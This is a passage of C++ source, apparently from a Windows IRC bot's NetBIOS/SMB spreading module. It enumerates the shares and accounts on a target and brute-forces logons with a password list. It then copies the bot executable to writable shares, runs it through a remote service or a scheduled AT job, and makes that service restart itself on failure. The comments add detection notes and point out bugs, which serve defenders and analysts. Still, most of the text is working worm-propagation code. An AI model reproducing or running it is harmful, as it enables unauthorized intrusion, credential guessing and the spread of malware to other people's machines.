int pwd_count=0; while(pwds[pwd_count] && !bExploited)
{ if(AuthSession((*iUsers)->sName.CStr(), pwds[pwd_count]) && !bExploited)
{ bExploited=Exploit((*iShares)->sName.CStr(), m_sSocket.m_szHost, (*iUsers)->sName.CStr(), pwds[pwd_count]);
CloseSession(); }
pwd_count++; }
iUsers++; }
iShares++; iUsers=m_lUsers.begin(); }
for(iUsers=m_lUsers.begin(); iUsers!=m_lUsers.end(); ++iUsers) delete (*iUsers);
for(iShares=m_lShares.begin(); iShares!=m_lShares.end(); ++iShares) delete (*iShares);
m_lUsers.clear(); m_lShares.clear();
return bExploited;
}
// Opens an anonymous ("null") IPC connection to m_wszResource with NetUseAdd level 2,
// passing empty user, password and domain strings. Returns true when NetUseAdd
// succeeds, and also when it reports ERROR_SESSION_CREDENTIAL_CONFLICT (an existing
// session to the resource is taken as good enough); any other status returns false.
// The raw NET_API_STATUS is left in m_NetApiStatus for the caller. No cleanup is
// done here; CloseSession() is the matching NetUseDel.
// Defender note: this is the classic null-session IPC$ probe; host-side anonymous-access
// restrictions block it, and it is visible as an anonymous network logon on the target.
bool CScannerNetBios::NullSession()
{ memset(&m_UseInfo, 0, sizeof(m_UseInfo));
m_UseInfo.ui2_local=NULL; // no local device name: plain IPC use, nothing is mapped locally
m_UseInfo.ui2_remote=(unsigned short*)m_wszResource; // cast implies m_wszResource is not declared as LPWSTR here - TODO confirm
m_UseInfo.ui2_password=L""; // empty credentials on purpose (null session)
m_UseInfo.ui2_username=L"";
m_UseInfo.ui2_domainname=L"";
m_UseInfo.ui2_asg_type=USE_IPC; // set explicitly here; AuthSession() leaves this field at 0 from the memset
m_NetApiStatus=NetUseAdd(NULL, 2, (LPBYTE)&m_UseInfo, NULL);
if(m_NetApiStatus==ERROR_SESSION_CREDENTIAL_CONFLICT) return true; // a session with other credentials already exists: treated as usable
if(m_NetApiStatus==NERR_Success) return true; else return false; }
// Opens an authenticated connection to m_wszResource with NetUseAdd level 2 using
// the given user name and password (both narrow strings, converted to wide here).
// Returns true on NERR_Success or ERROR_SESSION_CREDENTIAL_CONFLICT, false otherwise;
// m_NetApiStatus keeps the raw status. The caller (the password loop above this
// function) pairs each successful call with CloseSession().
// Defender note: every call is one network logon attempt against the target, so a run
// of these shows up as a burst of failed logons for the same account in the target's
// security audit log; account lockout thresholds cap how many attempts can succeed.
bool CScannerNetBios::AuthSession(const char *user, const char *password)
{ memset(&m_UseInfo, 0, sizeof(m_UseInfo)); // note: ui2_asg_type stays 0 after this memset (NullSession() sets USE_IPC) - TODO confirm intended
m_UseInfo.ui2_local=NULL;
WCHAR wszUser[256], wszPassword[256];
// lenof() is presumably an element-count macro (defined elsewhere). mbstowcs with a count
// equal to the buffer size does not NUL-terminate when the input fills the buffer, so an
// input of 256+ characters would leave the wide string unterminated - TODO confirm callers bound this.
mbstowcs(wszUser, user, lenof(wszUser));
mbstowcs(wszPassword, password, lenof(wszPassword));
m_UseInfo.ui2_remote=m_wszResource;
m_UseInfo.ui2_password=wszPassword;
m_UseInfo.ui2_username=wszUser;
m_UseInfo.ui2_domainname=L""; // no domain: local account logon on the target
m_NetApiStatus=NetUseAdd(NULL, 2, (LPBYTE)&m_UseInfo, NULL);
if(m_NetApiStatus==ERROR_SESSION_CREDENTIAL_CONFLICT) return true; // an existing session to the resource counts as success
if(m_NetApiStatus==NERR_Success) return true; else return false;
}
// Tears down the connection to m_wszResource with NetUseDel, forcing it closed even
// if files are open (USE_LOTS_OF_FORCE). Returns true on NERR_Success, false otherwise;
// the status is stored in m_NetApiStatus.
bool CScannerNetBios::CloseSession()
{ m_NetApiStatus=NetUseDel(NULL, m_wszResource, USE_LOTS_OF_FORCE);
if(m_NetApiStatus==NERR_Success) return true; else return false; }
// Enumerates the shares exported by m_wszServer (NetShareEnum level 1) and appends a
// heap-allocated shareinfo (name + remark, narrowed with wcstombs) for every share
// except "ipc$" to *lpShares. Returns false, without touching *lpShares, when the
// enumeration call fails; true otherwise. Ownership of the pushed shareinfo objects
// passes to the caller (the scan loop above deletes them).
// Defender note: remote share enumeration over SMB is the reconnaissance step here; it is
// answered by the Server service and can be audited/blocked at the host firewall and via
// anonymous-access restrictions.
bool CScannerNetBios::GetShares(list<shareinfo*> *lpShares)
{ DWORD dwEntriesRead=0, dwTotalEntries=0;
m_NetApiStatus=NetShareEnum(m_wszServer, 1, (LPBYTE*)&m_ShareInfo, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwTotalEntries, NULL);
if(m_NetApiStatus!=NERR_Success) return false; // ERROR_MORE_DATA is also treated as failure; m_ShareInfo is not freed on this path - TODO confirm no buffer is returned then
SHARE_INFO_1* l_ShareInfo=m_ShareInfo;
// Loop bound is dwTotalEntries, not dwEntriesRead; the two only match when the whole
// listing fit in the buffer. With MAX_PREFERRED_LENGTH that is the normal case, but a
// mismatch would walk past the returned array - TODO confirm.
for(int x=0; x<(int)dwTotalEntries; x++)
{ shareinfo *pShare=new shareinfo;
// wcstombs with count 256 into a 256-byte buffer does not NUL-terminate when the name fills it.
wcstombs(pShare->sName.GetBuffer(256), (const wchar_t*)l_ShareInfo->shi1_netname, 256);
wcstombs(pShare->sRemark.GetBuffer(256), (const wchar_t*)l_ShareInfo->shi1_remark, 256);
// stricmp() is non-zero when the names differ, so everything but ipc$ is kept.
// The ipc$ entry's shareinfo is allocated above and simply dropped here (leaked).
if(stricmp(pShare->sName.CStr(), "ipc$")) lpShares->push_back(pShare); l_ShareInfo++; }
if(m_ShareInfo!=0) NetApiBufferFree(m_ShareInfo); // buffer was allocated by NetShareEnum
return true; }
// Enumerates the user accounts on m_wszServer (NetUserEnum level 1, all account types)
// and appends a heap-allocated userinfo (account name plus m_wszHost as the server
// name) for each one to *lpUsers. Follows the ERROR_MORE_DATA resume protocol, freeing
// the API buffer after every page. Returns true only when the final call reported
// ERROR_SUCCESS; on any other status the loop is left early and false is returned,
// keeping whatever entries were already pushed. Ownership of the userinfo objects
// passes to the caller.
// Defender note: remote account enumeration is what anonymous-access restrictions on the
// SAM are designed to stop; allowed, it hands an attacker the account list to spray.
bool CScannerNetBios::GetUsers(list<userinfo*> *lpUsers)
{ DWORD dwEntriesRead=0, dwRemaining=0, dwResume=0, dwRC; do
{ dwRC=NetUserEnum(m_wszServer, 1, 0, (LPBYTE*)&m_UserInfo, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwRemaining, &dwResume);
if(dwRC!=ERROR_MORE_DATA && dwRC!=ERROR_SUCCESS) break; // access denied etc.: stop paging; m_UserInfo is not freed on this path - TODO confirm no buffer is returned then
USER_INFO_1 *l_UserInfo=m_UserInfo;
for(int x=0; x<(int)dwEntriesRead; x++)
{ userinfo *pUser=new userinfo;
// wcstombs with count 256 into a 256-byte buffer does not NUL-terminate when the input fills it.
wcstombs(pUser->sName.GetBuffer(256), l_UserInfo->usri1_name, 256);
wcstombs(pUser->sServer.GetBuffer(256), m_wszHost, 256);
lpUsers->push_back(pUser); l_UserInfo++; }
if(m_UserInfo!=0) NetApiBufferFree(m_UserInfo); } // one API buffer per page
while(dwRC==ERROR_MORE_DATA); // dwResume carries the enumeration handle into the next page
if(dwRC!=ERROR_SUCCESS) return false; return true; }
// Checks whether the share reached through the current session is writable by creating
// "\\host\share\testfile", then hands off to StartViaCreateService() and, if that fails,
// StartViaNetScheduleJobAdd(). Returns true when either of those reports success, false
// when the probe file cannot be created or both methods fail. At scaninfo_level >= 3 the
// plaintext user/password pair is echoed through SendLocal().
// Defender note: the probe file is created and closed but never deleted, so a file named
// "testfile" at the root of a writable share is an artefact of this code having run;
// writes to admin shares from a remote session are also visible in object-access auditing.
bool CScannerNetBios::Exploit(const char *share, const char *host, const char *user, const char *password)
{ char buffer[MAX_PATH]; sprintf(buffer, "\\\\%s\\%s\\testfile", host, share); // unbounded sprintf into MAX_PATH; host/share lengths are not checked here
FILE *fp=fopen(buffer, "w+"); if(fp)
{ fclose(fp); // write access confirmed; the file is left in place
if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 3)
{
SendLocal("%s: Exploiting \\\\%s\\%s with l/p: %s/%s", m_sScannerName.CStr(), host, share, user, password);
}
// Service-based start is tried first, the AT-job route only as a fallback.
if(StartViaCreateService(share, host, user, password)) return true;
else if(StartViaNetScheduleJobAdd(share, host, user, password)) return true;
else return false; }
else return false; }
// Fallback start method: copies this program's file (path obtained from GetFilename())
// to "\\host\share\<bot_filename>", then asks the target's Schedule service via
// NetScheduleJobAdd to run it one minute after the target's current time of day
// (read with NetRemoteTOD). Returns true only when NetScheduleJobAdd succeeds; false
// when the remote clock cannot be read or the job is refused. The user and password
// parameters are not used in this body - the session opened by AuthSession() is
// presumably what authorises the calls. m_NetApiStatus keeps the last API status.
// Defender note: a remotely created AT job whose command points at a UNC path on the
// target's own share is the observable here, together with the copied file; the job is
// never removed by this code. The NetRemoteTOD buffer (pTOD) is never released with
// NetApiBufferFree.
bool CScannerNetBios::StartViaNetScheduleJobAdd(const char *share, const char *host, const char *user, const char *password)
{ char buffer[MAX_PATH]; CString sReply; LPTIME_OF_DAY_INFO pTOD=NULL; AT_INFO at; DWORD dwJobId; // sReply is unused
GetFilename(buffer, MAX_PATH); // presumably the running executable's path - TODO confirm
char rem_buffer[MAX_PATH]; sprintf(rem_buffer, "\\\\%s\\%s\\%s", host, share, g_pMainCtrl->m_cBot.bot_filename.sValue.CStr()); // unbounded sprintf into MAX_PATH
unsigned long lTimeoutStart=GetTickCount();
// CopyFile with bFailIfExists=false overwrites; retried every 100 ms for up to ~100 s.
while(CopyFile(buffer, rem_buffer, false)==false && GetTickCount()-lTimeoutStart<100000) Sleep(100);
m_NetApiStatus=NetRemoteTOD(m_wszHost, (LPBYTE*)&pTOD); // target's clock, so the job time is in the target's frame
if(m_NetApiStatus==NERR_Success)
{ wchar_t wszBotRemote[MAX_PATH]; wchar_t wszFilename[MAX_PATH];
// Job command = m_wszResource + "\" + bot_filename (no bounds check on the concatenation).
wcscpy(wszBotRemote, m_wszResource);
mbstowcs(wszFilename, g_pMainCtrl->m_cBot.bot_filename.sValue.CStr(), lenof(wszFilename));
wcscat(wszBotRemote, L"\\");
wcscat(wszBotRemote, wszFilename);
memset(&at, 0, sizeof(at)); at.Command=&wszBotRemote[0];
// Convert the remote time of day to milliseconds since midnight (AT_INFO.JobTime units).
unsigned long lMsecs=(pTOD->tod_hunds*10); lMsecs+=(pTOD->tod_secs*1000);
lMsecs+=((pTOD->tod_mins*60)*1000); lMsecs+=(((pTOD->tod_hours*60)*60)*1000);
lMsecs+=60000; // 60000 ms = 1 minute offset (the original comment said "60 minute"); no wrap handling past midnight
at.DaysOfMonth=0; at.DaysOfWeek=0; at.JobTime=lMsecs; // one-shot job, not recurring
m_NetApiStatus=NetScheduleJobAdd(m_wszHost, (LPBYTE)&at, &dwJobId);
if(m_NetApiStatus==NERR_Success) {
if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 2)
{
SendLocal("%s: Exploited \\\\%s\\%s (NetScheduleJobAdd)!!!", m_sScannerName.CStr(), host, share);
}
return true; }
else return false; }
else return false; }
// Primary start method: opens the target's Service Control Manager remotely, copies this
// program's file to "\\host\share\<bot_filename>", registers a temporary demand-start
// service (name from g_pMainCtrl->m_sTmpSvcName, command "<remote path>" -service), starts
// it, waits 5 s and deletes the temporary service again. It then opens the persistent
// service named by as_service_name (presumably installed by the "-service" run - TODO
// confirm), starts it and configures a failure action of restart after 1 ms.
// Returns false only when OpenSCManager fails; otherwise bRetVal is set true after
// DeleteService regardless of whether CreateService/StartService succeeded, so the
// "Exploited" report below does not prove the service actually ran. The user and
// password parameters are unused here. The retry/ERROR_SERVICE_EXISTS handling is
// commented out further down, so hService is passed to StartService/DeleteService
// unchecked.
// Defender note: the observable sequence on the target is a remote SCM connection,
// a service-install record for the temporary name whose binary path is a UNC path on the
// target's own share, its deletion a few seconds later, and a start of the persistent
// service; that short-lived service plus the dropped file are the indicators to hunt for.
bool CScannerNetBios::StartViaCreateService(const char *share, const char *host, const char *user, const char *password)
{ bool bRetVal=false; char buffer[MAX_PATH]; SC_HANDLE hServiceControl=OpenSCManager(host, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); // remote SCM; needs admin on the target
if(!hServiceControl) return false; char szBotRemote[MAX_PATH]; CString sTempPath; // sTempPath is unused
GetFilename(buffer, MAX_PATH); // presumably the running executable's path - TODO confirm
sprintf(szBotRemote, "\\\\%s\\%s\\%s", host, share, g_pMainCtrl->m_cBot.bot_filename.sValue.CStr()); // unbounded sprintf into MAX_PATH
long lTimeoutStart=GetTickCount(); // signed here, unsigned in the sibling function; the subtraction below is done in DWORD arithmetic
// CopyFile with bFailIfExists=false overwrites; retried every 100 ms for up to ~100 s.
while(CopyFile(buffer, szBotRemote, false)==false && GetTickCount()-lTimeoutStart<100000) Sleep(100);
CString rndSvcName=g_pMainCtrl->m_sTmpSvcName.CStr();
CString sSvcCmd; sSvcCmd.Format("\"%s\" -service", szBotRemote); // binary path is the UNC path on the target's own share
SC_HANDLE hService=CreateService(hServiceControl, rndSvcName,
rndSvcName, SERVICE_ALL_ACCESS, \
SERVICE_WIN32_SHARE_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, \
sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
/*
if(!hService) {
DWORD dwError=GetLastError();
if(dwError==ERROR_SERVICE_EXISTS) {
hService=OpenService(hServiceControl, rndSvcName, SERVICE_ALL_ACCESS);
if(!hService) { CloseServiceHandle(hServiceControl); return false; }
SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);
return StartViaCreateService(share, host, user, password);
}
}
*/
SERVICE_STATUS ssStatus; // unused
StartService(hService, 0, NULL); // hService may be NULL here (see the disabled block above); return value is ignored
Sleep(5000);
DeleteService(hService); // temporary service removed; the handle itself is closed below
bRetVal=true; // set unconditionally: success is reported even if the calls above failed
hService=OpenService(hServiceControl, g_pMainCtrl->m_cBot.as_service_name.sValue.CStr(), SERVICE_ALL_ACCESS); // the original handle is overwritten without CloseServiceHandle
StartService(hService, 0, NULL);
// Failure action: restart the service 1 ms after a failure, failure count reset every 5 s.
SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=5; sfActions.lpRebootMsg=NULL;
sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;
ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions);
if(hService) CloseServiceHandle(hService);
if(hServiceControl) CloseServiceHandle(hServiceControl);
if(bRetVal)
{
if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 2)
{
SendLocal("%s: Exploited %s\\%s (CreateService)", m_sScannerName.CStr(), host, share);
}
}
return bRetVal; }
// Registers this scanner twice with the scanner framework, once per SMB transport port:
// 139 (NetBIOS session) and 445 (direct SMB). REGSCANNER is defined elsewhere; the
// meaning of the two trailing flags is not visible in this file - TODO confirm.
REGSCANNER(NetBios_139, NetBios, 139, true, false)
REGSCANNER(NetBios_445, NetBios, 445, true, false)
#endif // WIN32